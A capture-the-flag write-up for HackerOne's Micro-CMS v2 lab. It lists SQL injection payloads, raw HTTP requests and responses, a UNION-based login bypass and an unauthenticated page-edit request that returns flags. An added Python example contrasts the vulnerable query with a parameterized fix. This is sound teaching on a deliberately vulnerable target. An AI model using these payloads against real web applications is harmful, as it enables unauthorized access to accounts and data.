October 28, 2019 · CTF
Hackerone - Micro-CMS v2
Flag 0
Use the Intruder payload list from PayloadsAllTheThings to test whether the username/password fields are injectable:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection/Intruder
It turns out that the query is:
SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')
The login accepts several injection payloads, such as:
Request  Payload                  Status  Error  Timeout  Length
3        '&'                      200     false  false    544
4        '^'                      200     false  false    544
5        '*'                      200     false  false    544
26       ' or 'x'='x              200     false  false    544
39       admin' or '1'='1         200     false  false    544
41       admin' or '1'='1'#       200     false  false    544
43       admin'or 1=1 or ''='     200     false  false    544
46       admin' or 1=1#           200     false  false    544
The following payload shows that the statement accepts a UNION (the error is only about the column count), so we can take advantage of that.
request
56 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 200 false false 713
response
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 10 Sep 2019 12:12:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 545
Connection: close
Traceback (most recent call last):
File "./main.py", line 145, in do_login
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
self.errorhandler(self, exc, value)
File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
raise errorvalue
OperationalError: (1222, 'The used SELECT statements have a different number of columns')
After some trial and error, I came up with the following injection:
request
POST /0d10032668/login HTTP/1.1
Host: 35.190.155.168
Content-Length: 47
Cache-Control: max-age=0
Origin: http://35.190.155.168
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://35.190.155.168/0d10032668/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=admin2' UNION ALL SELECT '1&password=1
response
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 10 Sep 2019 12:59:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Set-Cookie: l2session=eyJhZG1pbiI6dHJ1ZX0.XXeeKw.zPe8rMO2bKLsE6gML8FQts1Ve9M; HttpOnly; Path=/
Content-Length: 340
<!doctype html>
<html>
<head>
<title>Logged in</title>
</head>
<body>
<h1>Logged In!</h1>
<a href="home">Go Home</a>
<!-- You got logged in, congrats! Do you have the real username and password? If not, might want to do that! -->
</body>
</html>
That gets us in easily.
Now we look for the flag: back on the home page you will see the private page.
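To make the bypass concrete, here is an added example (not code from the challenge or this writeup) that rebuilds the format-string query from the traceback against a constructed in-memory SQLite table, shows why the UNION payload logs in, and puts the parameterized form beside it. The function names, the table contents and the placeholder password are assumptions; SQLite stands in for the app's MySQL.

```python
import sqlite3

# Constructed stand-in for the app's "admins" table (in-memory SQLite so it
# runs offline). The real admin password is unknown; a placeholder is used.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
conn.execute("INSERT INTO admins VALUES ('admin', 'REAL_PASSWORD_PLACEHOLDER')")
conn.commit()


def login_vulnerable(username, password):
    """Same query construction as the traceback on the page.

    The .replace('%', '%%') only doubles percent signs inside the value; it
    does nothing about quotes, so a quote in username closes the string
    literal and the rest of the input is parsed as SQL.
    """
    query = 'SELECT password FROM admins WHERE username=\'%s\'' % username.replace('%', '%%')
    row = conn.execute(query).fetchone()
    if row is None:
        return False
    # The app compares the first returned column with the submitted password.
    # "UNION ALL SELECT '1'" adds a row whose password column is attacker
    # chosen, so password=1 matches without knowing the stored value.
    return row[0] == password


def login_parameterized(username, password):
    """Hardened form: the value is bound as a parameter, so the quote and the
    UNION stay inside the username string and never reach the SQL parser."""
    row = conn.execute(
        "SELECT password FROM admins WHERE username=?", (username,)
    ).fetchone()
    if row is None:
        return False
    return row[0] == password


if __name__ == "__main__":
    payload = "admin2' UNION ALL SELECT '1"  # the payload from the writeup
    print("vulnerable   :", login_vulnerable(payload, "1"))     # True
    print("parameterized:", login_parameterized(payload, "1"))  # False
```

A UNION with two columns (as in the earlier attempt) raises the same kind of column-count error in SQLite that MySQL reported on the page.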
request
GET /0d10032668/page/3 HTTP/1.1
Host: 35.190.155.168
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://35.190.155.168/0d10032668/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: l2session=eyJhZG1pbiI6dHJ1ZX0.XXee3w._ZamW0N37U35BvnrDQnL3A9Y1vs
Connection: close
username=admin2%27+UNION+ALL+SELECT+%271&password=1
response
My secret is ^FLAG^f66848fd6e345a2c79e4676d51bdd1b876c9a9758f8b49a6786b86dedf589382$FLAG$
Flag 1
Just submit a POST request to the edit page with an empty Cookie header (the edit handler does not require a session):
request
POST /0d10032668/page/edit/5 HTTP/1.1
Host: 35.190.155.168
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://35.190.155.168/0d10032668/page/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie:
Content-Length: 369
title=Private+Page&body=My
response
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 10 Sep 2019 13:25:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 76
^FLAG^f3a1295fe628d94ba3edfbd6859558c94ce27ce2b6c2239f7d4cf6f9e6ccdf5f$FLAG$